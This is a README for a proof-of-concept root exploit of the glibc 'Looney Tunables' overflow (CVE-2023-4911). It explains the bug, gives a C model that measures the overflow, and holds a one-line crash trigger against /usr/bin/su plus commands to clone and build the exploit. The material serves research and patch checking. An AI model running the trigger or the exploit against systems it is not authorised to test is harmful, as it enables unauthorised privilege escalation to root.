
PoC for CVE-2023-4911 Looney Tunables


PoC & Exploit of CVE-2023-4911 "Looney Tunables"


OS: Linux | glibc: >= 2.34 | Made with: C, Python | Dependency: pwntools

This is a PoC of CVE-2023-4911 (a.k.a. "Looney Tunables"), a buffer overflow in the glibc dynamic loader (ld.so). The bug is in parse_tunables(), the function that parses the GLIBC_TUNABLES environment variable: a tunable written as name=name=value makes the loader copy the recognized tunable back into its strdup'ed copy of the string twice, writing past the end of the buffer. That copy-back only runs for setuid/setgid programs (AT_SECURE), so the overflow is reached through binaries such as su and gives a local user root. The bug was introduced in glibc 2.34 and fixed upstream in October 2023.

Code has been tested on Ubuntu 22.04.1 and 22.04.3 with glibc versions 2.35-0ubuntu3.1 and 2.35-0ubuntu3.3. No attempt has been made to generalize the PoC (read: "Works On My Machine"), so your mileage may vary.

As always, big kudos to the Qualys Threat Research Unit for the discovery of the vulnerability and for the very detailed writeup.

PoC

First, test whether the system you want to exploit is vulnerable. As an unprivileged user, run:

env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped)

A segmentation fault means the target is vulnerable: ld.so crashed while parsing the malformed tunable, before any of su's own code ran. On a patched glibc the command simply prints su's usage text. The target has to be a setuid binary such as /usr/bin/su, because the overflowing copy-back only runs in secure mode (AT_SECURE); a non-setuid program will not crash even on a vulnerable system.
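To see why the doubled name makes the loader crash, here is an added example written for this README; it is neither glibc's source nor the exploit's code. It models the secure-mode copy-back loop of parse_tunables() from glibc 2.34 against a one-entry tunable table (an assumption of the model) and writes through a bounds-counting sink instead of the real buffer, so it measures the overflow instead of triggering it. The fixed variant reproduces only the loop exit changed by the upstream patch; everything else is shared.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for glibc's tunable_list[]: one entry is enough to show the bug
   (reduced table, an assumption of this model). */
static const char *const known_tunables[] = { "glibc.malloc.mxfast" };

/* Same rule as glibc's tunable_is_name(): NAME must equal ORIG and be
   followed immediately by '='. */
static bool tunable_is_name(const char *orig, const char *name)
{
    while (*orig != '\0' && *orig == *name) orig++, name++;
    return *orig == '\0' && *name == '=';
}

/* Bounds-counting stand-in for "tunestr[off++] = c".  ld.so writes straight
   into its strlen+1 byte copy of GLIBC_TUNABLES; here a byte that does not
   fit is counted in past_end instead of stored, so nothing is corrupted. */
struct sink { char *buf; size_t cap, off, past_end; };

static void put(struct sink *s, char c)
{
    if (s->off < s->cap) s->buf[s->off] = c; else s->past_end++;
    s->off++;
}

/* Model of the secure-mode (AT_SECURE) copy-back loop of parse_tunables().
   FIXED=false ends each iteration the way glibc 2.34 did, FIXED=true the way
   the CVE-2023-4911 fix does.  Returns the bytes written (NUL included) and
   stores in *PAST_END how many of them fall outside the buffer. */
static size_t copy_back(const char *env, bool fixed, size_t *past_end)
{
    size_t n = strlen(env);
    struct sink s = { malloc(n + 1), n + 1, 0, 0 }; /* like tunables_strdup() */
    const char *p = env;

    while (true) {
        const char *name = p;
        size_t len = 0;
        while (p[len] != '=' && p[len] != ':' && p[len] != '\0')
            len++;                      /* find the end of the name */
        if (p[len] == '\0')
            break;                      /* no name=value pair left */
        if (p[len] == ':') {
            p += len + 1;               /* empty element, skip it */
            continue;
        }
        p += len + 1;

        const char *value = p;          /* the value runs to ':' or the end, */
        len = 0;                        /* so a second '=' becomes part of it */
        while (p[len] != ':' && p[len] != '\0')
            len++;

        for (size_t i = 0; i < sizeof known_tunables / sizeof *known_tunables; i++) {
            if (!tunable_is_name(known_tunables[i], name))
                continue;
            if (s.off > 0)              /* recognized: copy "name=value" back */
                put(&s, ':');
            for (const char *c = known_tunables[i]; *c != '\0'; c++)
                put(&s, *c);
            put(&s, '=');
            for (size_t j = 0; j < len; j++)
                put(&s, value[j]);
            break;
        }

        if (p[len] == '\0') {
            /* End of input.  glibc 2.34 looped again with p still on the tail
               of the value ("glibc.malloc.mxfast=A"), parsed it as a fresh
               name=value pair and copied the tunable a second time.  The
               upstream fix leaves the loop here instead. */
            if (fixed)
                break;
            continue;
        }
        p += len + 1;
    }
    put(&s, '\0');
    *past_end = s.past_end;
    free(s.buf);
    return s.off;
}

size_t bytes_written(const char *env, bool fixed) { size_t past; return copy_back(env, fixed, &past); }
size_t bytes_past_end(const char *env, bool fixed) { size_t past; copy_back(env, fixed, &past); return past; }

int main(void)
{
    const char *poc = "glibc.malloc.mxfast=glibc.malloc.mxfast=A"; /* the check string above */
    printf("buffer: %zu bytes\n", strlen(poc) + 1);
    printf("glibc 2.34 loop: %zu bytes written, %zu past the end\n",
           bytes_written(poc, false), bytes_past_end(poc, false));
    printf("fixed loop:      %zu bytes written, %zu past the end\n",
           bytes_written(poc, true), bytes_past_end(poc, true));
    return 0;
}
```

Build with `cc -std=c11 -Wall model.c -o model` (file name assumed). For the 41-character check string the 2.34 loop writes 64 bytes into a 42-byte buffer, 22 of them past the end, while the fixed loop writes exactly 42. A well-formed "glibc.malloc.mxfast=A" fits in both variants, and an unrecognized name is dropped rather than copied, which is why the doubled name has to be a real tunable.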

Prerequisites

You'll need Python 3 and pwntools. On Ubuntu/Debian:

apt update
apt install -y python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

Installation and Exploit

git clone https://github.com/TiiZss/CVE-2023-4911
cd CVE-2023-4911
make

Result

(screenshot of the exploit run: "Success")

Exploit written by Xion of KAIST Hacking Lab

Modifications written by tisasia, member of TiiZss Hacking Lab